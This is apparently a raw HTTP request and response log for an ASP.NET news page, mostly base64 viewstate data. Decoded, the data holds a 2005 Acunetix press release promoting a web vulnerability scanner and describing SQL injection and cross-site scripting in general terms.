CAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4%2B8K4F%2F0js11lBw12IN%2FOFdqHcc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKpz%2FfHDgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBHLN3myVVFzWOQRRF0fUO8vWuGWI
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30581
Response Body - size: 30,581 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAg